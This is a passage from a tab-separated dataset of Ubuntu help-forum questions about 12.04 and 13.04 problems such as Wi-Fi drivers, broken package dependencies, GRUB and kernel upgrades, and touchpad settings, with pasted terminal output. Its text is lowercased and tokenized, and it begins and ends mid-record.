abs_y ) value 1550 min 0 max 4095 resolution 21 event code 47 ( abs_mt_slot ) value 0 min 0 max 15 event code 48 ( abs_mt_touch_major ) value 0 min 0 max 255 resolution 10 event code 49 ( abs_mt_touch_minor ) value 0 min 0 max 255 resolution 10 event code 52 ( abs_mt_orientation ) value 0 min 0 max 1 event code 53 ( abs_mt_position_x ) value 0 min 0 max 4095 resolution 12 event code 54 ( abs_mt_position_y ) value 0 min 0 max 4095 resolution 21 event code 57 ( abs_mt_tracking_id ) value 0 min 0 max 65535 event code 60 ( ? ) value 0 min 0 max 4095 resolution 12 event code 61 ( ? ) value 0 min 0 max 4095 resolution 21 properties : property type 1 ( input_prop_direct ) here is some of the sample data when i touch the screen with evtest : single touch : event : time 1376299024.902314 , type 3 ( ev_abs ) , code 57 ( abs_mt_tracking_id ) , value 23 event : time 1376299024.902314 , type 3 ( ev_abs ) , code 53 ( abs_mt_position_x ) , value 292 event : time 1376299024.902314 , type 3 ( ev_abs ) , code 54 ( abs_mt_position_y ) , value 1678 event : time 1376299024.902314 , type 3 ( ev_abs ) , code 60 ( ? ) , value 292 event : time 1376299024.902314 , type 3 ( ev_abs ) , code 61 ( ? ) , value 1678 event : time 1376299024.902314 , type 3 ( ev_abs ) , code 48 ( abs_mt_touch_major ) , value 1 event : time 1376299024.902314 , type 1 ( ev_key ) , code 330 ( btn_touch ) , value 1 event : time 1376299024.902314 , type 3 ( ev_abs ) , code 0 ( abs_x ) , value 292 event : time 1376299024.902314 , type 3 ( ev_abs ) , code 1 ( abs_y ) , value 1678 event : time 1376299024.902314 , -- -- -- -- -- -- -- syn_report -- -- -- -- -- -- event : time 1376299024.959259 , type 3 ( ev_abs ) , code 57 ( abs_mt_tracking_id ) , value -1 event : time 1376299024.959259 , type 1 ( ev_key ) , code 330 ( btn_touch ) , value 0 event : time 1376299024.959259 , -- -- -- -- -- -- -- syn_report -- -- -- -- -- -- two fingers : event : time 1376299060.941027 , -- -- -- -- -- -- -- syn_report -- -- -- -- -- -- event : time 1376299065.006084 , type 3 ( ev_abs ) , code 57 ( abs_mt_tracking_id ) , value 25 event : time 1376299065.006084 , type 3 ( ev_abs ) , code 53 ( abs_mt_position_x ) , value 409 event : time 1376299065.006084 , type 3 ( ev_abs ) , code 54 ( abs_mt_position_y ) , value 1227 event : time 1376299065.006084 , type 3 ( ev_abs ) , code 60 ( ? ) , value 409 event : time 1376299065.006084 , type 3 ( ev_abs ) , code 61 ( ? ) , value 1227 event : time 1376299065.006084 , type 1 ( ev_key ) , code 330 ( btn_touch ) , value 1 event : time 1376299065.006084 , type 3 ( ev_abs ) , code 0 ( abs_x ) , value 409 event : time 1376299065.006084 , type 3 ( ev_abs ) , code 1 ( abs_y ) , value 1227 event : time 1376299065.006084 , -- -- -- -- -- -- -- syn_report -- -- -- -- -- -- event : time 1376299065.043034 , type 3 ( ev_abs ) , code 47 ( abs_mt_slot ) , value 1 event : time 1376299065.043034 , type 3 ( ev_abs ) , code 57 ( abs_mt_tracking_id ) , value 26 event : time 1376299065.043034 , type 3 ( ev_abs ) , code 53 ( abs_mt_position_x ) , value 457 event : time 1376299065.043034 , type 3 ( ev_abs ) , code 54 ( abs_mt_position_y ) , value 2799 event : time 1376299065.043034 , type 3 ( ev_abs ) , code 60 ( ? ) , value 457 event : time 1376299065.043034 , type 3 ( ev_abs ) , code 61 ( ? ) , value 2799 event : time 1376299065.043034 , -- -- -- -- -- -- -- syn_report -- -- -- -- -- -- event : time 1376299065.114060 , type 3 ( ev_abs ) , code 47 ( abs_mt_slot ) , value 0 event : time 1376299065.114060 , type 3 ( ev_abs ) , code 57 ( abs_mt_tracking_id ) , value -1 event : time 1376299065.114060 , type 3 ( ev_abs ) , code 0 ( abs_x ) , value 457 event : time 1376299065.114060 , type 3 ( ev_abs ) , code 1 ( abs_y ) , value 2799 event : time 1376299065.114060 , -- -- -- -- -- -- -- syn_report -- -- -- -- -- -- event : time 1376299065.122075 , type 3 ( ev_abs ) , code 47 ( abs_mt_slot ) , value 1 event : time 1376299065.122075 , type 3 ( ev_abs ) , code 57 ( abs_mt_tracking_id ) , value -1 event : time 1376299065.122075 , type 1 ( ev_key ) , code 330 ( btn_touch ) , value 0 event : time 1376299065.122075 , -- -- -- -- -- -- -- syn_report -- -- -- -- -- --
330417	ca n't see my flash drive on the launcher	i unlocked my 4gb flash drive from the launcher , but ca n't i figure out how to get it back on . i ca n't seem to find it anywhere . please help me .
330419	ubuntu 13.04 boots as terminal . no graphics . radeon hd 7550m	i just installed ubuntu 13.04 on a pre-installed windows 8 vaio . the thing is , ubuntu boots as terminal , no graphic enviroment . ( in fact , when it boots the screen starts to flash and flicker , though i can hear the login sound . it boots as terminal when i use nomodeset boot option ) . i think that the problem is the video card : an advanced microdevices radeon hd 7550m 1gb . i see there 's a driver available at the radeon website , but i do n't know how to download and install it by terminal . also , i 'm not sure the problem is actually the driver . help please !
330424	reinstalling software-center issues	so here 's the problem . i was having a problem with software-center and i thought that a nice little uninstall-reinstall might just solve the problem . after checking that it was fine , i did it . however i am unable to reinstall the software-center . i had performed two removal commands : sudo apt-get remove software-center sudo apt-get autoremove software-center when trying the update commmand this is what i got : $ sudo apt-get update hit http : //dl.google.com stable release.gpg hit http : //dl.google.com stable release hit http : //dl.google.com stable/main i386 packages hit http : //ppa.launchpad.net raring release.gpg hit http : //ppa.launchpad.net raring release ign http : //dl.google.com stable/main translation-en hit http : //ppa.launchpad.net raring/main i386 packages hit https : //private-ppa.launchpad.net raring release.gpg ign http : //ppa.launchpad.net raring/main translation-en hit https : //private-ppa.launchpad.net raring release.gpg hit https : //private-ppa.launchpad.net raring release hit https : //private-ppa.launchpad.net raring release hit https : //private-ppa.launchpad.net raring/main i386 packages hit https : //private-ppa.launchpad.net raring/main i386 packages ign https : //private-ppa.launchpad.net raring/main translation-en ign https : //private-ppa.launchpad.net raring/main translation-en reading package lists ... done when i performed the install command this is what i got : $ sudo apt-get install software-center reading package lists ... done building dependency tree reading state information ... done package software-center is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'software-center ' has no installation candidate please help , i 'm pretty new to ubuntu and i 'm not exactly sure how to get the files for it to be able to install the software-center again . some more information : i 'm running ubuntu 13.04 . software-center does not exist at all on the computer as well , i 've checked . i read in another thread that i might have an issue with my source server , but when i checked software and updates it says im downloading from the main server . please help ! as per the suggestion to try : sudo apt-get install ubuntu-desktop this is what i got : $ sudo apt-get install ubuntu-desktop [ sudo ] password for user : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package ubuntu-desktop as per the suggestion to check the sources.list file , here 's what i got : $ sudo gedit /etc/apt/sources.list ( process:3045 ) : gtk-warning ** : locale not supported by c library . using the fallback 'c ' locale . ( gedit:3045 ) : ibus-warning ** : the owner of /home/user/.config/ibus/bus is not root ! the file that opened was blank . checked if the file was blank and here 's what i got : $ sudo ls -l /etc/apt/sources.list ls : can not access /etc/apt/sources.list : no such file or directory $ sudo cat /etc/apt/sources.list cat : /etc/apt/sources.list : no such file or directory i guess its safe to assume that its empty ?
330431	unmet dependencies when installing wine , ubuntu 13.04	i 'm running ubuntu 13.04 , 64 bit , and i ca n't install wine . i 've tried the solutions presented here and here , but to no avail . when i use the command sudo apt-get install wine , the terminal returns reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming.` the following information may help to resolve the situation : the following packages have unmet dependencies : wine : depends : wine1.6 but it is not going to be installed e : unable to correct problems , you have held broken packages . how can i install wine if these solutions do not work ? edit : it should be noted that i 'm dual-booting ubuntu 13.04 and win7 edit : by following thesei was able to successfully install wine . whether or not this is a result of all of the answers and these results , or just these results , i 'm not sure .
330433	folder inclusion/streaming	edited : when i used windows - i used nero media home essentials 4 to stream my videos to my lg bluray player . all i did was click `` add share '' and select my `` movies '' folder - then it showed up on my bluray player . how do i do this in ubuntu ?
330434	im upgrading from 11.04 to 13.04	how to do a full install of the 13.04 onto my pc . i am presently on 11.04 version , & i 'm downloading the 13.04 version iso file but how do i do a clean install . regards beck
330435	how to use a multi factor authentication device with ubuntu server 12.04 ?	i have a multi factor authentication ( mfa ) device similar to http : //onlinenoram.gemalto.com/ is it possible to use it with ubuntu server 12.04 ? if yes , what packages do i need to install to get it working ?
330438	python troubles on ubuntu 12.04	after a system updates i having troubles with a python based apps the updater-manager does n't download the updates packages , and i realized this python trobles because i use flexget for rss downloading , which is python based , and when i run it it return : ~ $ flexget traceback ( most recent call last ) : file `` /usr/local/bin/flexget '' , line 5 , in < module > from pkg_resources import load_entry_point importerror : no module named pkg_resources if i run pip , a python script , it returns : $ sudo pip install flexget traceback ( most recent call last ) : file `` /usr/bin/pip '' , line 5 , in < module > from pkg_resources import load_entry_point importerror : no module named pkg_resources everything points to this line : `` from pkg_resources import load_entry_point '' in flexget i found this : http : //flexget.com/wiki/pipproblems but reinstalling python did n't solved the trouble how could it be fixed
330446	installing ubuntu on many laptops	at my company we are upgrading our hardware and i need to reinstall ubuntu on ~15 laptops . do you have any clues how to approach it ? do i need to sit in front of every machine and manually click through installation process ? they are exactly the same machines and they need to be configured exactly the same way .
330450	why does the ubuntu one ipad app only work with activated location services ?	i got an ipad as a present . being a typical nerd , of course i deactivated the location services . i especially do n't want my published photos to contain location information . now the ubuntu one ipad app wo n't let me add files or folders if i wo n't activate these services . for what purpose does this app want these features ? the android app that does the same , does not need location services . is there a workaround allowing me to upload anything without those services ? thanks , paddy
330451	how should i use unionfs or similar in a computer lab to `` freeze '' /home ?	lab computers need to be `` frozen . '' we 'll be switching our xp lab of about 30 computers over to something else this winter , and i 'm making a couple of proposals , one of which is ltsp , and another is an immutable live-like system , updated monthly . my third proposal for them is a more traditionally installed system , but with tmpfs laid over /home using unionfs . ram for some of these older machines is 1gb , so it occurs to me that i might be able to force a swap or other disposable , on-disk partition over /home instead of ram , but i 'm unsure how to proceed with this and my google-fu is failing me . there 's a lot of information out there , and tmpfs will use swap when it runs out of ram , but i do n't want the machine to die of swap death . instead , i 'd rather have the changes to the user 's $ home be written to swap directly instead of stored in ram and swapped out . the partition would , of course , need to be reset between reboots . how is this kind of setup possible ? tia .
330457	rngd does not run when started remotely	i am trying to increase the entropy of several ubuntu 13.04 ec2 instances by running ssh -n -o stricthostkeychecking=no -i ... user @ host `` sudo rngd -r /dev/urandom -o /dev/random -t 10 '' from a remote box . however rngd does not seem to do anything until i log onto the vm . at least if i log on and immediately run cat /proc/sys/kernel/random/entropy_avail it gives numbers around 150 . after a few seconds it gives numbers in the 3000 's . if i use ssh to run cat /proc/sys/kernel/random/entropy_avail remotely without having logged on the i get results around 150 as well . is this a general daemon issue of something rngd is doing ?
330460	managing the boot order	does anyone know if there is a way to rearrange the order of the operation systems listed in the boot screen , so that the pc will boot to windows as a default , instead of having to arrow down to windows , which shows up at the bottom of the boot list ?
330461	how to speed down two-fingers trackpad scrolling ?	i move the arrow of touchpad speed bar to the left . also , i tweak dconf editor 's touchpad setting motion-acceleration , motion-threshold , etc.. and it did n't work . after all , if i change scroll-method from two-finger-scrolling to edge-scrolling , it did n't change at all , also set touchpad-enable to off , and it did n't change too . those are answers posted on askubuntu . so what are these setting ? is it any meaningful functionality built in ubuntu ? and is it feasible to change touchpad scrolling speed ? i use macbook pro trackpad , and i want to set the speed as smoothly and user-friendly as os x . thanks . [ update to answer the question by mdoran3844 ] /dev/input/event0 bustype : bus_host vendor : 0x0 product : 0x1 version : 0 name : `` power button '' phys : `` lnxpwrbn/button/input0 '' bits ev : ev_syn ev_key /dev/input/event1 bustype : bus_host vendor : 0x0 product : 0x3 version : 0 name : `` sleep button '' phys : `` lnxslpbn/button/input0 '' bits ev : ev_syn ev_key /dev/input/event2 bustype : bus_i8042 vendor : 0x1 product : 0x1 version : 43907 name : `` at translated set 2 keyboard '' phys : `` isa0060/serio0/input0 '' bits ev : ev_syn ev_key ev_msc ev_led ev_rep /dev/input/event3 bustype : bus_i8042 vendor : 0x2 product : 0x6 version : 0 name : `` imexps/2 generic explorer mouse '' phys : `` isa0060/serio1/input0 '' bits ev : ev_syn ev_key ev_rel
330468	restore previous applications on restart in ubuntu 13.04 easily ?	how to restore previous applications when i restart the computer in ubuntu 13.04 ? this post ( how do i save sessions or reopen last-used applications ? ) is not in 13.04 and i actually tried to use what lucio suggested in the post , ( i.e . dconf - > org - > gnome - > gnome-session and click on checkbox ) , but it did n't work at all . even if what izx suggested in the post works on 13.04 too , which i do n't know it does , do i have to spend three hours just setting the functionality of restoring previous applications on ? os x offers it either on default , or force you to just three minutes work . is it feasible to do such a minimal work and still get what i wanted ? sorry but i do n't think it is worth three hours to just set restoring my applications on . thanks .
330472	wifi module stops connect to any access points	after updates wifi stops connect to any point ( exclude router at work ) . it 's just try to connect after that show window for password and do it again and again . i try to reinstall driver but unfortunately these does n't help . 12:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) ubuntu 12.04.2 lts \n \l most funny thing what this is dell vostro 1440 which in certified ubuntu laptop list .
330475	i having problem while use sudo apt-get update	something wicked happened resolving 'security.ubuntu.com : http ' ( -11 - system error ) ign http : //security.ubuntu.com raring-security release ign http : //security.ubuntu.com raring-security/main sources/diffindex 100 % [ connecting to security.ubuntu.com ] terminal will show like that only it is not fully loaded how could i solve this problem ?
330476	broadcom 4313gn wifi adapter ca n't connect wifi 12.04	i have a hp sleekbook envy with a broadcom 4313gn wifi adapter , and i ca n't get the wireless adapter to work . i can see wireless connections that are available , but when i try to connect and put in the wep key it tries to connect for around 1 minute and then asks me for the wep key again , over and over again . i have only gotten a wired connection to work with ubuntu , but i know my wifi adapter is fine because i 'm dual booting windows 7 with ubuntu 12.04 , and although the wifi reception is n't great i know it is n't a hardware problem ( since it works with windows 7 ) i have read several questions similar to this one ( i tried to figure this out on my own first ) , but none of them had a clear solution . i thought i would just need to download a driver ... also , i would n't be against upgrading my wifi adapter to one that ubuntu supports , this one does n't seem very good . but i 'd rather get this one working if possible . edit : these are the results from the terminal commands : lspci -nn | grep 0280 : 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) lsmod | grep -e wl -e brcmsmac : wl 3074895 0 cfg80211 205774 1 wl lib80211 14381 2 lib80211_crypt_tkip , wl edit 2 : i 'm not sure if i ran it correctly ... ryan @ ubuntu : ~ $ sudo su [ sudo ] password for ryan : sorry , try again . [ sudo ] password for ryan : root @ ubuntu : /home/ryan # sudo su root @ ubuntu : /home/ryan # apt-get remove -- purge bcmwl-kernel-source reading package lists ... done building dependency tree reading state information ... done package bcmwl-kernel-source is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . root @ ubuntu : /home/ryan # echo brcmsmac > > /etc/modules root @ ubuntu : /home/ryan # exit it still does n't work
330486	how to see output from a php script	i am new to php programming and i have installed it on ubuntu server , the server is a lamp server . as i was doing my introductory lecture , i created first.php file but i understand it can not be compiled and run like c or java . i would want to know what i must do to see that my program is working . the ubuntu server that i am working on does not have gui installed so i would want to know if i can still use it successfully .
330488	switched from win to ubuntu 12.04 and cd & dvd drives are n't recognizing media	i had an old reliable desktop running winxp , but after some registry errors caused the system to be unstable i thought i 'd give ubuntu a try . i booted the 12.04 iso from the cd drive and the installation seemed to go smoothly . however , after installing updates and re-booting neither of my optical drives seem to work . one is a tdk cdrw 24/10/40b and the other a pioneer dvr-105 . output from sudo lshw | grep cdrom : *-cdrom:0 logical name : /dev/cdrom1 *-cdrom:1 logical name : /dev/cdrom output from sudo lshw *-cdrom:0 description : cd-r/cd-rw writer physical id : 0.0.0 bus info : scsi @ 1:0.0.0 logical name : /dev/cdrom1 logical name : /dev/cdrw1 logical name : /dev/sr0 capabilities : audio cd-r cd-rw configuration : status=nodisc *-cdrom:1 description : dvd writer product : dvd-rw dvr-105 vendor : pioneer physical id : 0.1.0 bus info : scsi @ 1:0.1.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/sr1 version : 1.33 capabilities : removable audio cd-r cd-rw dvd dvd-r configuration : ansiversion=5 status=nodisc looking through other posts that dealt with the same problem , i installed libdvdnav4 , libdvdcss2 , libdvdcss-dev , libdvdread4 , gstreamer0.10-plugins-bad and gstreamer0.10-plugins-ugly packages . i can see both drives from the computer window , but neither shows under devices on the left side of file manager . i 'd appreciate some help if anyone has any suggestions . thanks !
330493	how to set up persistence in ubuntu usb live boot ?	i have ubuntu 13.04 running off of a live usb which was created using pendrivelinux . it works great , but i 'm having a problem . when creating the usb , i selected the data persistence option , and set it to the highest value ( ~4gb ) , since i have a large flashdrive . however , whenever i boot up , and select the usb as the boot device , it takes me to a screen that gives me the option of trying or installing . it makes sense to ask the first time , but this keeps happening everytime i boot into ubuntu , and the data i saved to test , is gone . is there a step i missed to configure the persistent disk inside ubuntu ? thanks for any help !
330495	ppa for vim builds with python , ruby etc interfaces enabled ?	title says it all ... looking for a vim ppa which is recent builds ( within last week ) of vim with language bindings enabled ... i found this : https : //launchpad.net/~dgadomski/+archive/vim-daily but lua , ruby and python 3.3 is n't enabled .
330496	use cron to mail log from a job	i have a weekly script that cron runs to make a zfs snapshot . i was wondering if it is possible to mail a ok mail if the job run correctly and a error mail if something happened and in the content of the mail to have the job log . how to do this ? 25 11 * * 5 /home/aegrimisu/zfs-autosnapshot.sh > > /home/aegrimisu/zfs-weeklysnapshot.log 2 > & 1 | mail -s `` zfs snapshot status '' mymail @ yahoo.com the script content is : # ! /bin/bash path=/usr/local/sbin : /usr/local/bin : /sbin : /bin : /usr/sbin : /usr/bin zfs snapshot misu @ misu-`date + % y. % m. % d- % h : % m : % s`
330501	can not upgrade kernel and mysql-server after dist upgrade	did an upgrade from 12.04 via 12.10 to 13.04 . every upgraded fine but the kernel did not . i am stuck with 3.2.0.52 . i decided to leave it for the time being but now mysql did an autoupgrade and that crashed leaving me without mysql-server . install -f gives following output : # apt-get -f install reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . 8 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up linux-image-3.8.0-28-generic ( 3.8.0-28.41 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/apt-auto-removal 3.8.0-28-generic /boot/vmlinuz-3.8.0-28-generic run-parts : executing /etc/kernel/postinst.d/dkms 3.8.0-28-generic /boot/vmlinuz-3.8.0-28-generic run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.8.0-28-generic /boot/vmlinuz-3.8.0-28-generic update-initramfs : generating /boot/initrd.img-3.8.0-28-generic run-parts : executing /etc/kernel/postinst.d/pm-utils 3.8.0-28-generic /boot/vmlinuz-3.8.0-28-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.8.0-28-generic /boot/vmlinuz-3.8.0-28-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.8.0-28-generic /boot/vmlinuz-3.8.0-28-generic generating grub.cfg ... run-parts : /etc/kernel/postinst.d/zz-update-grub exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.8.0-28-generic.postinst line 1010. dpkg : error processing linux-image-3.8.0-28-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up mysql-server-5.5 ( 5.5.32-0ubuntu0.13.04.2 ) ... start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up memtest86+ ( 4.20-1.1ubuntu3 ) ... generating grub.cfg ... dpkg : error processing memtest86+ ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up grub-pc ( 2.00-13ubuntu3 ) ... installation finished . no error reported . generating grub.cfg ... dpkg : error processing grub-pc ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of linux-image-extra-3.8.0-28-generic : linux-image-extra-3.8.0-28-generic depends on linux-image-3.8.0-28-generic ; however : package linux-image-3.8.0-28-generic is not configured yet . dpkg : error processing linux-image-extra-3.8.0-28-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.8.0-28-generic ; however : package linux-image-3.8.0-28-generic is not configured yet . linux-image-generic depends on linux-image-extra-3.8.0-28-generic ; however : package linux-image-extra-3.8.0-28-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.8.0.28.46 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of mysql-server : mysql-server depends on mysql-server-5.5 ; however : package mysql-server-5.5 is not configured yet . dpkg : error processing mysql-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : linux-image-3.8.0-28-generic mysql-server-5.5 memtest86+ grub-pc linux-image-extra-3.8.0-28-generic linux-image-generic linux-generic mysql-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) please advice
330502	installation options	i have created a new logical partition ( h ) on my hardrive and want to install ubuntu in that partition . i also want to have access to my windows 7 files and programmes . i would like some advice as to which installation option i should use .
330503	is there an arm based ubuntu os i can install on the microsoft surface rt ?	since the price of the microsoft surface has dropped significantly , i 'm seriously considering getting one . the only problem - i hate windows . i would really love to install ubuntu on it - even if i have to run it from a flash drive . i just would like double assurance , and maybe some instruction on how i could do the install ! either way , i think you guy will be able to help me on this one . if i ca n't , then i 'll probably just buy an ipad mini ( which would n't be as cool ... ) cheers ! - mike
330511	installing xampp on ubuntu 13.04 64-bits	can any one can help me installing xampp server from http : //www.apachefriends.org/ in to my ubuntu 13.04 64-bit desktop version plzz
330517	intel corporation 82579lm ubuntu 12.04 connection drops every 5 minutes	i have a problem with my new dell optiplex 9010 , the intel corporation 82579lm ethernet card and ubuntu 12.04 . my ethernet connection drops often ( almost every 5 minutes ) and then restarts after 30 seconds . i have already installed the last version of the e1000e drivers and disabled ipv6 but it did not solve my problem . any idea on how to fix it ?
330518	how to install ubuntu on free dos os on lenovo g580-59-358263 ? ( for experienced lenevo users )	my lenovo g580-59-358263 laptop will be coming in the next 2-3 days which has pre-installed dos operating system ( no windows ) , i prefer that way . well i 've never installed ubuntu on dos running laptops before . i want to gain the knowledge before i try hands on installation on this . also , after installing do you have problems connecting to network ( through wifi or broadband ) ? what about the drivers ? below is the list of configuration for my lenovo g580-59-358263 laptop . laptop info ... os - dos , ram - 4gb ddr3 - [ 3mb cache ] , hdd - 500gb , graphics - intel hd 4000 have you had any problems installing other linux distros ?
330523	can ubuntu run on one machine while being installed on another ?	i have an desktop computer on which the hard disk gave out its is also connected by network to a brand new i5 desktop running windows . is there a way in which i can install ubuntu on a shared drive in the i5 computer and use it to run unbuntu on the old computer ?
330528	problem after removing apache2	i 've tried to remove apache2 by : sudo apt-get remove apache2 next : sudo apt-get autoremove after that , on http : //localhost still appears following text : it works ! this is the default web page for this server . the web server software is running but no content has been added , yet . why after removing apache2 above text still appears ?
330531	unable to fix broken package system	after i ( painfully ) managed to install skype on my ubuntu 12.04 lts , i 'm experiencing since months ago a packages issue i can not fix . have a look to my last post in order to know what caused this issue : install skype on ubuntu 12.04 lts 64-bit if i try to install system updates the update manager closes unexpectedly stating that the package system is broken and throws the following error : the following packages have unmet dependencies : grub-efi-amd64 : depends : grub2-common ( = 1.99-21ubuntu3.9 ) but 1.99-21ubuntu3.10 is installed depends : grub-efi-amd64-bin ( = 1.99-21ubuntu3.9 ) but 1.99-21ubuntu3.10 is installed if i run sudo apt-get -f install in order to fix potential packages issues i get the following : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : linux-image-3.5.0-26-generic linux-headers-3.5.0-26 linux-headers-3.5.0-26-generic use 'apt-get autoremove ' to remove them . the following extra packages will be installed : grub-efi-amd64 the following packages will be upgraded : grub-efi-amd64 1 upgraded , 0 newly installed , 0 to remove and 28 not upgraded . 2 not fully installed or removed . need to get 39.5 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //archive.ubuntu.com/ubuntu/ precise-updates/main grub-efi-amd64 amd64 1.99-21ubuntu3.10 [ 39.5 kb ] fetched 39.5 kb in 0s ( 154 kb/s ) dpkg : dependency problems prevent configuration of grub-efi-amd64 : grub-efi-amd64 depends on grub2-common ( = 1.99-21ubuntu3.9 ) ; however : version of grub2-common on system is 1.99-21ubuntu3.10 . grub-efi-amd64 depends on grub-efi-amd64-bin ( = 1.99-21ubuntu3.9 ) ; however : version of grub-efi-amd64-bin on system is 1.99-21ubuntu3.10 . dpkg : error processing grub-efi-amd64 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of grub-efi-amd64-signed : grub-efi-amd64-signed depends on grub-efi-amd64 ( > = 1.99-21ubuntu3.5 ) ; however : package grub-efi-amd64 is not configured yet . dpkg : error processing grub-efi-amd64-signed ( -- configure ) : dependency problems - leaving unconfiguredno apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : grub-efi-amd64 grub-efi-amd64-signed e : sub-process /usr/bin/dpkg returned an error code ( 1 ) if i run sudo dpkg -- configure -a i get : dpkg : dependency problems prevent configuration of grub-efi-amd64 : grub-efi-amd64 depends on grub2-common ( = 1.99-21ubuntu3.9 ) ; however : version of grub2-common on system is 1.99-21ubuntu3.10 . grub-efi-amd64 depends on grub-efi-amd64-bin ( = 1.99-21ubuntu3.9 ) ; however : version of grub-efi-amd64-bin on system is 1.99-21ubuntu3.10 . dpkg : error processing grub-efi-amd64 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of grub-efi-amd64-signed : grub-efi-amd64-signed depends on grub-efi-amd64 ( > = 1.99-21ubuntu3.5 ) ; however : package grub-efi-amd64 is not configured yet . dpkg : error processing grub-efi-amd64-signed ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : grub-efi-amd64 grub-efi-amd64-signed my understanding is that the root cause is unmet dependecies of packages grub-efi-amd64 and grub-efi-amd64-signed , so i have tried what is described here how do i resolve unmet dependencies ? but the problem still persist . i 'm not sure if the removal of the conflicting packages would fix the issue , but i have n't done it yet as i 'm afraid i could ruin my system as it has efi boot and i 'm booting it with grub . for the same reason i have n't tried to run sudo apt-get -u dist-upgrade , as perhaps the conflicting packages could be automatically removed . i 'd like to know if others have had a similar experience as well as possible solutions to this . just as additional info this is the output of gedit /etc/apt/sources.list : # deb cdrom : [ ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) ] / dists/precise/main/binary-i386/ # deb cdrom : [ ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) ] / dists/precise/restricted/binary-i386/ # deb cdrom : [ ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) ] / precise main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //archive.ubuntu.com/ubuntu precise main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //archive.ubuntu.com/ubuntu precise-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu precise universe deb http : //archive.ubuntu.com/ubuntu precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //archive.ubuntu.com/ubuntu precise multiverse deb http : //archive.ubuntu.com/ubuntu precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu precise-security main restricted deb http : //archive.ubuntu.com/ubuntu precise-security universe deb http : //archive.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu precise partner deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . # deb http : //extras.ubuntu.com/ubuntu precise main # deb-src http : //extras.ubuntu.com/ubuntu precise main deb http : //archive.canonical.com/ precise partner deb-src http : //archive.canonical.com/ precise partner and gedit /etc/apt/sources.list.d/* ( different files ) : deb-src http : //ppa.launchpad.net/cassou/emacs/ubuntu precise main # # # this file is automatically configured # # # # you may comment out this entry , but any other modifications may be lost . deb http : //dl.google.com/linux/chrome/deb/ stable main # # # this file is automatically configured # # # # you may comment out this entry , but any other modifications may be lost . deb http : //dl.google.com/linux/chrome/deb/ stable main deb http : //ppa.launchpad.net/guilhem-fr/swftools/ubuntu precise main deb-src http : //ppa.launchpad.net/guilhem-fr/swftools/ubuntu precise main deb-src http : //ppa.launchpad.net/rabbitvcs/ppa/ubuntu precise main deb http : //ppa.launchpad.net/yannubuntu/boot-repair/ubuntu precise main deb-src http : //ppa.launchpad.net/yannubuntu/boot-repair/ubuntu precise main deb http : //ppa.launchpad.net/yannubuntu/boot-repair/ubuntu precise main deb-src http : 